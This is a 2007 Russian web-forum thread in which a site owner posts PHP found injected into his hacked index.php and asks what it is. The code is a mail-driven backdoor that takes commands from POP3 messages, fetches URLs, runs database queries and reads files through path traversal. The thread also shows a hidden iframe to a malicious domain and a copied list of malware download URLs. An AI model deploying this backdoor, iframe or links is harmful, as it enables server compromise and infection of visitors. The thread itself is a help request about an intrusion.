| |
|
|
| | Помогите! Может кто то знает что это за PHP
Файл index.php был изменен на
preg_match("/^(localhost|127\.0\.0\.1)(:[0-9]+)?$/",$HTTP_HOST)){
$letter=file("testLetter2.txt");
$rep.=process($letter);
if(empty($a)){
$mailRes=mail($returnmail, "Mail robot report ($HTTP_HOST)", $rep, $addtoheader);
$mess="Simple mail sent to: <B>$returnmail</B>";
//echo "-debug version------mailRes=$mailRes=--";
}else{
$filename = 'answer.gz';
$zd = gzopen ($filename, "wb");
gzwrite ( $zd, $rep);
gzclose ($zd);
$tp="application/x-zip-compressed";
$fd=fopen($filename,"rb");
$data=fread($fd,filesize($filename));
fclose($fd);
require_once "../../common/mailerClass.php";
$mail=new mailer;
$mail->from="$HTTP_HOST robot";
$mail->subject="$mysubject (arc) Mail robot report";
$mail->body="Compressed attachment ($HTTP_HOST robot)";
$mail->add_attachment($data,$filename,$tp,"base64");
if(empty($email)) $email="basmanovvn@mail.sochi.ru";
$mail->to=$email;
$mailRes=$mail->send();
$mess="Archive mail sent to: <B>$mail->to</B>";
};
if ($mailRes) {
echo $mess;
}else{
echo "<FONT COLOR=red>Ошибка отправки: archive</FONT><B>$email</B>";
}
return $rep;
};
$buffer=512;
$fp = @fsockopen($pop3serv, $pop3port);
if (!$fp) {
$letter=array("cannotConnect");
echo "Cannot connect"."<BR>";
$mailRes=mail($returnmail, "Mail robot report", "Cannot connect.", $addtoheader);
return;
}
$firstLine = fgets($fp, 1024);
fputs($fp, "USER $user\r\n");
$secondLine = fgets($fp, 1024);
fputs($fp, "PASS $password\r\n");
$line3 = fgets($fp, 1024);
if (substr($line3, 0, 3) != "+OK") {
echo "Wrong password"."<BR>";
$mailRes=mail($returnmail, "Mail robot report", "Wrong password", $addtoheader);
return;
}
$rq="STAT";
fputs($fp, $rq."\r\n");
$line = fgets($fp, 1024);
$line = split(" ", $line);
$kol = $line[1];
echo "Have $kol letters."."<BR>";
$rep="Have $kol letters.\n";
if ($kol==0) {
$letter="";
echo "No letters"."<BR>";
return;
}
$processed=0;
for($nn=1;$nn<=$kol;$nn++){
$isforme=false;
fputs($fp, "RETR $nn\r\n");
$count = 0;
$letter = array();
$line = fgets($fp,$buffer);
while ( !ereg("^\.\r\n",$line))
{
if(preg_match("/^Subject: $mysubject(\s|$)/",$line)) $isforme=true;
if(preg_match("/^Subject: /",$line)) {
echo "<BR><BR>Letter $nn ($isforme)<BR> $line<BR>";
};
$letter[$count] = $line;
$count++;
$line = fgets($fp,$buffer);
if(empty($line)) { break; }
}
if(!$isforme) continue;
$processed++;
$rq="DELE $nn";
fputs($fp, $rq."\r\n");
$line = fgets($fp, 1024);
echo "Letter $nn of $kol deleted..."."<BR>";
echo "Letter $nn of $kol processing..."."<BR>";
$rep.="Letter $nn of $kol processing..."."<BR>";
$rep.=process($letter);
echo "<PRE>"; print_r($letter); echo "</PRE>";
//echo "\n-------report------------\n<BR><BR>".$rep;
// $mailRes=mail($returnmail, "$mysubject Mail robot report", $rep, $addtoheader);
echo "Letter $nn of $kol processed <BR>";
$rep.="Letter $nn of $kol processed <BR>";
};
$rq="QUIT";
fputs($fp, $rq."\r\n");
$line = fgets($fp, 1024);
fclose($fp);
if($processed>0){
if(empty($a)){
// $mailRes=mail($returnmail, "$mysubject Mail robot report", $rep, $addtoheader);
$mailRes=mail($returnmail, "Mail robot report ($HTTP_HOST)", $rep, $addtoheader);
//echo "-debug version------mailRes=$mailRes=--";
}else{
$filename = 'answer.gz';
$zd = gzopen ($filename, "wb");
gzwrite ( $zd, $rep);
gzclose ($zd);
$tp="application/x-zip-compressed";
$fd=fopen($filename,"rb");
$data=fread($fd,filesize($filename));
fclose($fd);
require_once "../../common/mailerClass.php";
$mail=new mailer;
$mail->from="$HTTP_HOST robot";
$mail->subject="$mysubject (arc) Mail robot report";
$mail->body="Compressed attachment ($HTTP_HOST robot)";
$mail->add_attachment($data,$filename,$tp,"base64");
if(empty($email)) $email="basmanovvn@mail.sochi.ru";
$mail->to=$email;
$mailRes=$mail->send();
if ($mailRes) {
echo "Sent archive to: <B>$mail->to</B>";
}else{
echo "<FONT COLOR=red>Ошибка отправки: archive</FONT><B>$email</B>";
}
};
}else{
echo "Letters to process not found.<BR>";
}
// --- functions ----
function process($letter){
$host=$GLOBALS[HTTP_HOST].$GLOBALS[SCRIPT_NAME];
$host=preg_replace("|(/[^/]*){1,3}$|",'',$host);
reset($letter);
while(list($k,$v)=each($letter)){
$v=trim($v);
if(empty($v)) break;
}
while(list($k,$v)=each($letter)){
//echo " +++++++++++ (list($k,$v) (a=$action)=<BR>";
$action='';
$v=trim($v);
if(empty($v)) continue;
if(preg_match("/^\s*\//",$v)) continue;
if(preg_match("/^\s*host:\s*(.*)$/",$v,$m)) {
$host=$m[1];
//echo " -- host=$host<BR>";
continue;
}
if(preg_match("/^\s*([^:\s]+):\s*$/",$v,$m)) {
$action=$m[1];
continue;
}
//echo "1 a=$action= <B>$v</B> ...<BR>";
if(empty($action)){
if(preg_match("/^\s*http:/",$v)) $action="url";
elseif(preg_match("/^\s*(select|show|insert|replace|delete|update|alter|drop)\s/",$v)){
$action="db";
}elseif(preg_match("/^\s*([^\s]+):\s*(.*)/",$v,$z)){
$action=$z[1];
$v=$z[2];
}else $action="down";
}
//echo "2 a= $action <B>$v</B> ...<BR>";
if(empty($host) || empty($action)) continue;
//echo "3 a= $action <B>$v</B> ...<BR>";
//echo "Performing $action ($host) <B>$v</B> ...<BR>";
switch($action){
case "code" :
// $cd=join("",$text);
// $result=eval($cd);
// $report.="\nCode done (".strlen($cd)." bytes)<BR>";
// $report.="\nCode result: $result<BR>";
break;
case "down" :
$fn="http://".$host."/prog3/ftpsp/o.php?sort=name&plain=1&p=../../".$v;
//echo " \n\n fn=$fn <BR>";
$report.="\nGetting object: $fn $fn<BR>";
$result=file($fn);
$report.=join("",$result);
//echo "\nCode result: --------<PRE>".join("",$result)."</PRE>-------------<BR>";
break;
case "url" :
$result=file($v);
$result=join("",$result);
$report.="\nGot file <B>$v</B> (".strlen($result)." bytes)<BR>";
$report.="\nCode result: $result<BR>";
break;
case "db" :
case "db-replace" :
case "db-insert" :
case "db-update" :
$par="noform=1&task=".str_replace(' ', '+',$v);
$par.=<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->
|
| |
| |
|
|
| |
|
|
| |
для: дядя федя
(08.03.2007 в 14:39)
| | | мм.. просто спамит с твоего сервера. | |
| |
|
|
| |
|
|
| |
для: Бамси
(08.03.2007 в 15:02)
| | | Вроде скрипт некакого вреда не несет. Кроме того что твоего хостера запишут в спам лист:-D | |
| |
|
|
| |
|
|
| |
для: Poison
(08.03.2007 в 15:29)
| | | Кстати в коде полно ошибок возьмите хотя бы вторую строку. | |
| |
|
|
| |
|
|
| |
для: Бамси
(08.03.2007 в 15:02)
| | | В начале Index.php был изменен на
<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->
|
А потом уже на этот PHP
ftp:// LOG показал:
Mar 8 10:54:18 www ftpd[5705]: FTP LOGIN FROM 88.196.209.242 as wf-shop
это IP компании «Elion» Эстония www.elion.ee
тоже самое сейчас произошло с www.macroservice.net
я проверялся вирусов у меня нет
ftp:// пароли поменял не помагло
SSI не использовалось
ЧТО ДЕЛАТЬ? | |
| |
|
|
| |
|
|
| |
для: дядя федя
(08.03.2007 в 15:53)
| | | что то НАШЕЛ
"Инфицированные ссылки" (Infected links)
Вы в разделе"Инфицированные ссылки" (Infected links). Ниже список ссылок, пройдя по которым можно заразить компьютер. Данный раздел представлен в помощь IT отделам компаний.
Список часто обновляеться, и если вы хотите помочь нам в этом, то можете присылать ссылки на new(at)stopvirus.ru.
Внимание! Неосторожное обращение с разделом "Infected Links" может привести к фатальному заражению компьютера вредоносными программами!
Win32/Genetik trojan
http://www.wwworg.org/new.exe 02.03.07
------------------------------------------------------------------------------------
Win32/Stration Family
http://1039.dasdefunjetiondeandes.com/chr/IM/pic.pif 01.03.07
http://211.waserionyungandes.com/chr/IM/map.scr 28.02.07
http://1039.dasdefunjetiondeandes.com/chr/IM/pic.pif 26.02.07
http://6034.erinjdesunhafunwionsa.com/1/749/ 20.02.07
http://075.edinjionkdaserionpwasdin.com/1/772/ 20.02.07
http://670.paleruijidefuhnswerun.com/chr/IM/our_pics.pif 24.01.07
http://cards.kioloyunjdefunhades.com/2/show.xml?id=07070ab9b35dceb9b407e1f309131706 18.01.07
http://9897.kebadasecaxeza.com/chr/IM/pic.pif 18.01.07
http://cards.utrerfadesax.com/2/show.xml?id=d166e22f065115e5c087b81bd0d794cd 17.01.07
http://cards.aruihundesionkas.com/2/show.xml?id=491266d26f75875bb004fee44ce94d3c 17.01.07
http://7034.lonkdesunadefundesa.com/1/0111/pic.pif 17.01.07
http://4980.lonkdesunadefundesa.com/1/7957/pic.pif 17.01.07
http://6899.rohadesfunvers.com/1/0081/pic.pif 16.01.07
http://361.rohadesfunvers.com/1/818/pic.pif 16.01.07
http://cards.binadefalekance.com/chr/IM/postcard_flash.exe 16.01.07
http://cards.optenmaces.com/2/show.xml?id=c155d74123f0064a2caee71479d5525d 16.01.07
http://cards.vertionhetunshikinde.com/a/postcard_flash.exe 25.12.06
http://cards.gendinkionmadesun.com/a/postcard_flash.exe 25.12.06
http://2283.waserionyungandes.com/2/2517/picture.pif
------------------------------------------------------------------------------------
Win32/PSW.Lineage.WD trojan
(Загружает новую модификацию червя Win32/Stration.XN)
http://www.scmbc.co.kr/board/down/board/gochung/tvlist.jpg 28.02.07
------------------------------------------------------------------------------------
Win32/Small.R trojan
http://placeforporno.com/e/files.chm 28.02.07
------------------------------------------------------------------------------------
probably unknown NewHeur_PE virus
http://www,mdfc.info - содержит вредоносные скрипты - 28.02.07
http://211.waserionyungandes.com/chr/IM/map.scr 27.12.06
http://rus.step57.info/loads/loader.php 27.12.06
http://sun-1.org/exe/psbot.exe 27.12.06
http://mdfc.info/r/calc.exe?e=VwqNGMfT.exe 27.12.06
http://mdfc.info/r/calc.exe?e=vyfu6JLi.exe 27.12.06
http://mdfc.info/r/calc.exe?e=1WC9OsNM.exe 27.12.06
http://mdfc.info/r/calc.exe?e=iGV5obbJ.exe 27.12.06
-----------------------------------------------------------------------------------------
Win32/TrojanDownloader.Tiny.NCA trojan
http://www.abetterstart.com/c/2051/counter21.php?a=3&c=3 27.02.07
----------------------------------------------------------------------------------------
Win32/TrojanDownloader.Small.NQS trojan
http://hostonlinesite.com/z0.exe 23.01.07
http://trustdotnet.com/nnews/get.php?file=exe 23.01.07
----------------------------------------------------------------------------------------
Win32/Spy.BZub.NCH trojan
http://exflow.org/installer3.5.8.exe 19.01.07
----------------------------------------------------------------------------------------
JS/TrojanDownloader.Agent.BI trojan
http://www.affmoney.net/count.htm 27.12.06
------------------------------------------------------------------------------------
HTML/Exploit.VMLFill trojan
http://www.swisscycle.ch/img/index.php?s=sp&n=[e-mail]
http://www.swisscycle.ch/img/index.php?s=sp&n=WEB@STOPVIRUS.RU
Загружает два exe файла на рабочий стол a.bat и mhh.exe
------------------------------------------------------------------------------------
Win32/TrojanDownloader.Small.NOD trojan
http://acmetimeshares.com/zcs/gds.jpg
http://www.counter-pr.info/sp_pack/counter/loader.jpg
http://lahere.com/counter1/file.jpg
------------------------------------------------------------------------------------
Unknown (неизвестные битые адреса, возможно ссылка вирус)
http://0171.RXFF.NET/1/759/
http://9226.RXFF.NET/2/547/picture.pif
http://www.v-rostove.ru/ (взломанный сайт 1.12.06)
http://www.swisscycle.ch (взломанный сайт 19.12.06)
------------------------------------------------------------------------------------
Win32/TrojanDownloader.Nurech.AF trojan
http://life.c-commando.info/css3/exe.php?spl=fi 28.02.07
----------------------------------------------------------------------------------------
Win32/TrojanProxy.Cimuz.NAF trojan
http://cards.funnystories.ru/soft.exe 28.02.07
----------------------------------------------------------------------------------------
JS/TrojanDownloader.Agent.BI trojan
http://www.affmoney.net/count.htm 28.02.07
----------------------------------------------------------------------------------------
VBS/Redlof.M virus
http://www.gradi.ru/web/links_2.html 28.02.07
----------------------------------------------------------------------------------------
Win32/TrojanDownloader.Tiny.NCA trojan
http://www.abetterstart.com/c/2141/counter21.php?a=3&c=3 28.02.07
----------------------------------------------------------------------------------------
Win32/Adware.ZoneMedia application
http://67.15.107.166/ie_aff/070207/axdlplug-1.5.0.0-0147-setup.exe 28.02.07
----------------------------------------------------------------------------------------
Win32/TrojanDownloader.Small.NRT trojan
http://adult-holder.name/b/loader.exe 28.02.07
Win32/TrojanProxy.Dlena.NAE trojan
http://alert-ca.com/counter1/loadd.exe
Win32/Spy.Small.DP trojan
http://alert-ca.com/counter1/load.e
Отправить ссылку: new(at)stopvirus.ru
ВНИМАНИЕ!!! Данный раздел представлен исключительно в помощь пользователям и IT отделам.
За причененный вред компьютеру, воспользовавшись информацией данного раздела, СТОП-ВИРУС ответственности не несет!
Статус: "Общий доступ" (test)
ИСТОЧНИК http://stopvirus.ru/index.php?id=192 | |
| |
|
|
| |
|
|
| |
для: дядя федя
(08.03.2007 в 14:39)
| | | Если мозможно, свяжитесь со мной по email dima@tutby.com. Интересует еще информация по этому взлому. | |
| |
|
|
|
